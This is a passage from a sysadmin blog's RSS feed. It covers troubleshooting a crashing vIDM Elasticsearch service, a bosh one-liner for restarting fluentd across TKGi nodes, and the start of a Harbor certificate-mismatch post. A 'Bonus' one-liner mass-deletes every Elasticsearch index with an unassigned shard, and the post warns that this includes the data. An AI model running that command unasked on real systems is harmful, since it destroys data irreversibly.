<p>&nbsp;</p>
<pre>curl 'http://localhost:9200/_cluster/health'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}

curl -XGET 'http://localhost:9200/_cat/indices?v'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}</pre>
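<p>When several endpoints return bodies like the ones above, it can help to boil each response down to its status and error type. The following is a minimal sketch using only sed; <code>es_error_summary</code> is a hypothetical helper name of my own, not something that ships with vIDM or Elasticsearch, and it assumes the compact single-line JSON shown above.</p>
<pre>
```shell
#!/bin/sh
# Sketch: summarize an Elasticsearch error body using only sed.
# es_error_summary is a hypothetical helper, not part of vIDM or Elasticsearch.
es_error_summary() {
    body="$1"
    # Numeric "status" field at the end of the error body.
    status=$(printf '%s\n' "$body" | sed -n 's/.*"status":\([0-9][0-9]*\).*/\1/p')
    # Last "type" field in the body (the top-level error type).
    err_type=$(printf '%s\n' "$body" | sed -n 's/.*"type":"\([^"]*\)".*/\1/p')
    echo "status=${status:-unknown} type=${err_type:-unknown}"
}

# Sample body copied from the curl output above.
es_error_summary '{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}'
```
</pre>
<p>For the sample body this prints <code>status=500 type=null_pointer_exception</code>; anything it cannot parse is reported as <code>unknown</code> rather than guessed.</p>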
<p>&nbsp;</p>
<p>The elasticsearch log can be found here:  /opt/vmware/elasticsearch/logs/horizon.log</p>
<p>&nbsp;</p>
<p>I tailed it, and gave Elasticsearch itself a restart.</p>
<p>&nbsp;</p>
<pre>service elasticsearch restart

Stopping elasticsearch: process in pidfile `/opt/vmware/elasticsearch/elasticsearch.pid'done.
horizon-workspace service is running
Waiting for IDM: Ok.
Number of nodes in cluster is : 1
Configuring /opt/vmware/elasticsearch/config/elasticsearch.yml file

</pre>
<p>&nbsp;</p>
<p>I then tried to ask its health status a few times while it started, to see if it came up at all.</p>
<p>&nbsp;</p>
<p>Briefly, it did, before it died again!</p>
<p>&nbsp;</p>
<pre>

curl 'http://localhost:9200/_cluster/health?pretty'
{
"cluster_name" : "horizon",
"status" : "yellow",
"timed_out" : false,
"number_of_nodes" : 1,
"number_of_data_nodes" : 1,
"active_primary_shards" : 60,
"active_shards" : 60,
"relocating_shards" : 0,
"initializing_shards" : 0,
"unassigned_shards" : 60,
"delayed_unassigned_shards" : 0,
"number_of_pending_tasks" : 0,
"number_of_in_flight_fetch" : 0,
"task_max_waiting_in_queue_millis" : 0,
"active_shards_percent_as_number" : 50.0
}

</pre>
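<p>Asking for the health status a few times in a row, as I did above, could be scripted roughly like this. It is only a sketch: <code>poll_health</code> and <code>health_status</code> are hypothetical helper names, and the command to run is passed in as arguments so the same curl call can be reused unchanged.</p>
<pre>
```shell
#!/bin/sh
# Sketch: run a health-check command several times and print the cluster
# status seen on each attempt. Both function names are hypothetical.
health_status() {
    # Extract the value of the "status" field from pretty-printed health JSON.
    sed -n 's/.*"status" *: *"\([a-z]*\)".*/\1/p'
}

poll_health() {
    tries="$1"   # number of attempts
    delay="$2"   # seconds to wait between attempts
    shift 2      # the remaining arguments are the command to run
    i=1
    while [ "$i" -le "$tries" ]; do
        status=$("$@" | health_status)
        echo "attempt $i: ${status:-no cluster status}"
        i=$((i + 1))
        sleep "$delay"
    done
}
```
</pre>
<p>A possible invocation would be <code>poll_health 10 5 curl -s 'http://localhost:9200/_cluster/health?pretty'</code>. An error 500 body has a numeric status rather than a color, so those attempts show up as <code>no cluster status</code>, which makes the moment the service dies easy to spot.</p>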
<p>When I examined the log, I saw pretty quickly why I was getting an error 500.</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1665" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=640%2C207&#038;ssl=1" alt="" width="640" height="207" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=300%2C97&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=1024%2C331&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=768%2C248&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=1536%2C496&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?resize=2048%2C662&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1620-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>It shows Elasticsearch starting normally. It then discovers it has 244 indices to clean up (more on that later), so it sets health to yellow. But that is fine. At least it's not a complete fail.</p>
<p>&nbsp;</p>
<p>But then something odd happens.</p>
<p>&nbsp;</p>
<p>Something called 'com.vmware.idm.elasticsearch.plugin' makes an appearance and starts, somehow,  messing with the node count that Elasticsearch itself maintains for its cluster.</p>
<p>&nbsp;</p>
<p>This VMware KB kind of explains what might be going on here https://kb.vmware.com/s/article/74709 , though it references a similar, but different error, actually a timing situation involving a cluster consisting of more than 1 node.</p>
<p>&nbsp;</p>
<p>The point though, is this:</p>
<p>&nbsp;</p>
<p>'com.vmware.idm.elasticsearch.plugin' is a</p>
<p>&nbsp;</p>
<p><em>plugin for elasticsearch that asks IDM for the list of nodes that are expected to be in the cluster. It uses that list to determine how many nodes it should be able to see before a primary can be elected and the cluster formed. </em></p>
<p>&nbsp;</p>
<p>Seems logical. Elasticsearch can't know by itself what kind of cluster topology you build with vIDM, but vIDM knows.</p>
<p>&nbsp;</p>
<p>Based on the log, what seemed to be happening is that Elasticsearch starts normally and loads its config from</p>
<p>&nbsp;</p>
<pre>/opt/vmware/elasticsearch/config/elasticsearch.yml</pre>
<p>This config includes how many cluster nodes are expected (in my case just 1, because there is no cluster).</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone wp-image-1667" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?resize=434%2C186&#038;ssl=1" alt="" width="434" height="186" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?w=880&amp;ssl=1 880w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?resize=300%2C129&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1621.jpg?resize=768%2C330&amp;ssl=1 768w" sizes="auto, (max-width: 434px) 100vw, 434px" /></a></p>
<p>&nbsp;</p>
<p>But then, for some reason, the IDM plugin tries to update the running cluster node count <em>again</em>, and here something goes wrong. The Elasticsearch cluster service ends up removing its only node, and then, of course, the Elasticsearch service dies. The next message is that the cluster service can no longer connect.</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1668" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=640%2C64&#038;ssl=1" alt="" width="640" height="64" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=300%2C30&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=1024%2C102&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=768%2C77&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=1536%2C154&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?resize=2048%2C205&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1623-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>&nbsp;</p>
<p>I have no idea why this is happening, but it was pretty consistent: it happened every time I restarted the Elasticsearch service or rebooted the VM. The config for the IDM plugin is also contained in /opt/vmware/elasticsearch/config/elasticsearch.yml , but it doesn't keep its own node count value, so I am not sure why it thinks it can safely tell the cluster service to remove the only node.</p>
<p>&nbsp;</p>
<p>Anyway, the workaround here is pretty straightforward: simply disable the IDM plugin by setting the 'discovery.zen.idm.enabled' value to false (in /opt/vmware/elasticsearch/config/elasticsearch.yml ).</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1669" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=640%2C275&#038;ssl=1" alt="" width="640" height="275" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?w=1327&amp;ssl=1 1327w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=300%2C129&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=1024%2C440&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/2021-03-29_8-55-26b.jpg?resize=768%2C330&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Obviously this is unsupported, so do this at your own risk. If you ever expand the vIDM installation into a cluster, that will obviously break now, so you will have to turn this back on again. At that point, perhaps best to raise a VMware support ticket around this.</p>
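<p>For reference, the change could be scripted roughly like this. It is a minimal sketch, not something from VMware: the function name 'disable_idm_discovery' is made up for illustration, and it assumes the setting appears in the file as a plain 'key: value' line and that GNU sed is available on the appliance.</p>

```shell
# Hypothetical helper: set discovery.zen.idm.enabled to false in the given
# elasticsearch.yml, keeping a backup copy next to it as <file>.bak.
disable_idm_discovery() {
    conf="$1"
    cp -p "$conf" "$conf.bak" || return 1
    if grep -q '^[[:space:]]*discovery\.zen\.idm\.enabled:' "$conf"; then
        # Key already present: rewrite its value in place (GNU sed syntax).
        sed -i 's/^\([[:space:]]*discovery\.zen\.idm\.enabled:\).*/\1 false/' "$conf"
    else
        # Key not present (assumption: the default would then apply): append it.
        printf '%s\n' 'discovery.zen.idm.enabled: false' >> "$conf"
    fi
}
```

<p>You would call it as 'disable_idm_discovery /opt/vmware/elasticsearch/config/elasticsearch.yml' and then restart the Elasticsearch service. To turn the plugin back on later, copy the .bak file back.</p>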
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1670" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=640%2C440&#038;ssl=1" alt="" width="640" height="440" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?w=1175&amp;ssl=1 1175w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=300%2C206&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=1024%2C704&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1630.jpg?resize=768%2C528&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<h2>Bonus: Cleaning up unassigned shards</h2>
<p>&nbsp;</p>
<p>If your health stays yellow due to a number of 'unassigned shards' hanging around forever, you can force-delete them with the following one-liner. Be aware that it deletes every index that has an unassigned shard, including the data in it:</p>
<p>&nbsp;</p>
<pre>curl -s -XGET http://localhost:9200/_cat/shards | grep UNASSIGNED | awk '{print $1}' | sort -u | xargs -I{} curl -XDELETE "http://localhost:9200/{}"</pre>
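<p>Before running a delete like that, it may be worth listing what would be removed. A small sketch, assuming the default '_cat/shards' column order (index, shard, prirep, state, ...); the function name 'unassigned_indices' is made up for illustration:</p>

```shell
# Read `_cat/shards` output on stdin and print, once each, every index that
# has at least one shard in state UNASSIGNED (column 4 in the default layout).
unassigned_indices() {
    awk '$4 == "UNASSIGNED" { print $1 }' | sort -u
}

# Example, assuming Elasticsearch listens on localhost:9200 as in the post:
#   curl -s 'http://localhost:9200/_cat/shards' | unassigned_indices
```

<p>If the list contains an index you still care about, do not run the delete.</p>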
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1663</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/03/SNAG-1619.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1663</post-id>	</item>
		<item>
		<title>Guest on the VMware Community Podcast &#8211; and my upcoming Tanzu VMware{code} session</title>
		<link>https://thefluffyadmin.net/?p=1658</link>
					<comments>https://thefluffyadmin.net/?p=1658#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Thu, 25 Mar 2021 12:02:19 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Podcasts]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[Podcast]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[vBarbecue]]></category>
		<category><![CDATA[VMTN]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1658</guid>

					<description><![CDATA[Robert Kloosterhuis; https://thefluffyadmin.net/ , 25march2021 Had an excellent time on the #vmware #vcommunity podcast with last night.  Full recording here: My upcoming VMware{code} session on Tanzu for Beginners, for the 9th of April,  is here: https://blogs.vmware.com/code/2021/03/09/vmware-code-april-2021-power-sessions/… #tanzu #itqlife]]></description>
										<content:encoded><![CDATA[<p>Robert Kloosterhuis; https://thefluffyadmin.net/ , 25 March 2021</p>
<p>Had an excellent time on the <a href="https://twitter.com/hashtag/vmware?src=hashtag_click">#vmware</a> <a href="https://twitter.com/hashtag/vcommunity?src=hashtag_click">#vcommunity</a> podcast last night.</p>
<div>Full recording here:</div>
<p><iframe loading="lazy" title="YouTube video player" src="https://www.youtube.com/embed/dFgbRGDyNdI" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></p>
<div></div>
<div>My upcoming VMware{code} session on Tanzu for Beginners, on the 9th of April, is here: <a href="https://t.co/dfHk1X5v0o?amp=1" target="_blank" rel="noopener noreferrer">https://blogs.vmware.com/code/2021/03/09/vmware-code-april-2021-power-sessions/</a></div>
<div></div>
<div><a href="https://twitter.com/hashtag/tanzu?src=hashtag_click">#tanzu</a> <a href="https://twitter.com/hashtag/itqlife?src=hashtag_click">#itqlife</a></div>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1658</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/03/Screenshot-2021-03-25-130103.png</image><post-id xmlns="com-wordpress:feed-additions:1">1658</post-id>	</item>
		<item>
		<title>Useful Bosh Oneliner to restart something on a bunch of TKGi nodes.</title>
		<link>https://thefluffyadmin.net/?p=1654</link>
					<comments>https://thefluffyadmin.net/?p=1654#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Tue, 02 Mar 2021 17:56:48 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[bosh]]></category>
		<category><![CDATA[pks]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[tkgi]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1654</guid>

					<description><![CDATA[Robert Kloosterhuis, 2 March 2021 Found myself in a situation where I had to restart fluentd on every VM in a 130-node (!) TKGi(PKS) Kubernetes cluster. Fluentd is managed through Monit, and you can run a command through the Bosh ssh command. In this case: sudo monit restart fluentd So one of the customer admins <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1654">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>Robert Kloosterhuis, 2 March 2021</p>
<p>Found myself in a situation where I had to restart fluentd on every VM in a 130-node (!) TKGi (PKS) Kubernetes cluster.</p>
<p>Fluentd is managed through Monit, and you can run a command on a VM through the bosh ssh command. In this case: sudo monit restart fluentd</p>
<p>So one of the customer admins, who is <em>way</em> more fluent in bash than me, made this.</p>
<pre>bosh -e &lt;your bosh env&gt; -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa vms | \
awk '{print "bosh -e &lt;your bosh env&gt; -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa ssh "$1" -c \"sudo monit restart fluentd\""}' \
&gt; start-fluentd.sh</pre>
<p>And then simply check and run start-fluentd.sh</p>
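<p>To make it a bit clearer what the awk step in that one-liner does, here is the same idea as a small function you can feed sample input. This is just a sketch: the function name 'make_restart_commands' and the instance name in the example are made up, and it assumes the instance name ('group/id') is the first column of the 'bosh vms' output.</p>

```shell
# Turn `bosh vms` rows (read from stdin) into one `bosh ssh` command per VM.
# $1 = BOSH environment alias, $2 = deployment name, $3 = command to run.
# Only rows whose first column looks like "group/id" are used, so header
# lines are skipped.
make_restart_commands() {
    awk -v env="$1" -v dep="$2" -v cmd="$3" \
        '$1 ~ /\// { printf "bosh -e %s -d %s ssh %s -c \"%s\"\n", env, dep, $1, cmd }'
}

# Example with a made-up instance name:
#   printf 'worker/abc\trunning\n' | make_restart_commands my-env my-dep 'sudo monit restart fluentd'
```

<p>Writing the commands to a file first, instead of piping them straight into a shell, gives you a chance to read them before anything gets restarted.</p>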
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1654</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1654</post-id>	</item>
		<item>
		<title>Troubleshooting Certificate mismatch in Harbor in TKGi</title>
		<link>https://thefluffyadmin.net/?p=1615</link>
					<comments>https://thefluffyadmin.net/?p=1615#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Wed, 24 Feb 2021 10:21:49 +0000</pubDate>
				<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[certificate]]></category>
		<category><![CDATA[harbor]]></category>
		<category><![CDATA[monit]]></category>
		<category><![CDATA[opsman]]></category>
		<category><![CDATA[pks]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tkgi]]></category>
		<category><![CDATA[vmware]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1615</guid>

					<description><![CDATA[I recently deployed Harbor for a customer. This is the version of Harbor that has been pre-packaged into a 'Tile' , for use in Tanzu Kubernetes Grid Integrated edition [TKGi] (formerly known as Pivotal Container Service [PKS]). The tool that will deploy Harbor, in this case, is the Ops Manager, and it gives you a <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1615">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p>I recently deployed Harbor for a customer. This is the version of Harbor that has been <a href="https://network.pivotal.io/products/harbor-container-registry/">pre-packaged into a 'Tile'</a> , for use in Tanzu Kubernetes Grid Integrated edition [TKGi] (formerly known as Pivotal Container Service [PKS]).</p>
<p>The tool that will deploy Harbor, in this case, is the Ops Manager, and it gives you a nice interface where you can set up all the essential settings for Harbor.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1624" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=640%2C232&#038;ssl=1" alt="" width="640" height="232" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?w=1909&amp;ssl=1 1909w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=300%2C109&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=1024%2C372&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=768%2C279&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?resize=1536%2C558&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1430.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>One of the things you can set is the certificate to be used by Harbor.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1625" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=640%2C390&#038;ssl=1" alt="" width="640" height="390" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?w=2145&amp;ssl=1 2145w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=300%2C183&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=1024%2C624&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=768%2C468&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=1536%2C937&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?resize=2048%2C1249&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1432.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a> </p>
<p>In this case, we had the customer generate a certificate for Harbor for us. The bottom field is meant for the certificate of the Certificate Authority that issued the Harbor certificate.</p>
<p>I  made a simple mistake here. Previously, the customer had generated Certificates from their root CA. However, this time, they had set up an intermediate, issuing CA. I did not know this, and had <em>assumed</em> the certificate chain was the same as previously. So I pasted the <em>wrong</em> certificate into this field. The Root-CA, instead of the issuing, intermediate CA. <a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1626" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=533%2C148&#038;ssl=1" alt="" width="533" height="148" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?w=1128&amp;ssl=1 1128w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=300%2C83&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=1024%2C284&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1433.jpg?resize=768%2C213&amp;ssl=1 768w" sizes="auto, (max-width: 533px) 100vw, 533px" /></a></p>
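<p>A quick sanity check that would have caught this: compare the issuer of the Harbor certificate with the subject of the CA certificate you are about to paste. The sketch below assumes both are available as PEM files and that openssl is installed; the function name 'issued_by' and the file names in the usage line are made up for illustration. It only compares names and does not verify any signature.</p>

```shell
# Return 0 when the issuer name of certificate $1 equals the subject name of
# CA certificate $2 (both PEM files). Return 1 on a mismatch and 2 when
# openssl cannot read one of the files. This is a name comparison only.
issued_by() {
    issuer=$(openssl x509 -noout -issuer -nameopt RFC2253 -in "$1") || return 2
    subject=$(openssl x509 -noout -subject -nameopt RFC2253 -in "$2") || return 2
    [ "${issuer#issuer=}" = "${subject#subject=}" ]
}

# Example with hypothetical file names:
#   issued_by harbor.crt issuing-ca.crt && echo "CA matches"
```

<p>For a real check of the whole chain, something like 'openssl verify' with the CA chain in one file is the more thorough option.</p>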
<p>When I tried to deploy Harbor using Opsman, the deployment failed. <em>"Error: 'harbor-app/4d891315-d61e-4891-8512-486b7f93e5a2 (0)' is not running after update. Review logs for failed jobs: harbor"</em></p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1627" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=640%2C171&#038;ssl=1" alt="" width="640" height="171" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?w=1693&amp;ssl=1 1693w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=300%2C80&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=1024%2C273&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=768%2C205&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?resize=1536%2C410&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p><em>How</em> it failed is interesting, and that is what this post is mostly about.</p>
<p>Opsman uses BOSH under the covers to create and manage the VMs, and their contents, for any product it deploys.</p>
<p>It uses the <a href="https://bosh.io/docs/vm-monit/">Monit tool</a> to monitor the health of its VMs, and the result from Monit is also used to determine whether a deployment completed successfully or not. <br /><br />In fact, it is left to Monit to start and stop the various processes on a BOSH-managed VM. So Monit will contain a config for specific processes, to start them, stop them, and monitor their health. This can be as simple as monitoring a process ID, or it can be custom scripts. In the case of Harbor, it's some custom scripts that I will detail below.</p>
<p>In order to troubleshoot this issue further, we had to dig a bit deeper into the logs. There are two ways to do this. You can download a log bundle using the Opsman UI.</p>
<p>&nbsp;</p>
<p>Or you can SSH into the VM using the BOSH command-line tool and view the logs live in the /var/vcap/sys/log directory.</p>
<p>Examining the log structure, there are some things to note.</p>
<p>First of all, because this is a BOSH deployment of Harbor, there are various folders that refer to BOSH-specific items. <br />Harbor itself runs as a set of Docker containers. So you will also find a split between logs coming from Docker (or in this case, the results of Docker-Compose) and logs from the Harbor app components themselves.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1630" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?resize=356%2C214&#038;ssl=1" alt="" width="356" height="214" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?w=356&amp;ssl=1 356w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1436.jpg?resize=300%2C180&amp;ssl=1 300w" sizes="auto, (max-width: 356px) 100vw, 356px" /></a></p>
<p>If we look in the Harbor folder, we find the various logs that relate to starting and stopping Harbor, and then a further folder that contains the Harbor app-component logs (one per container).</p>
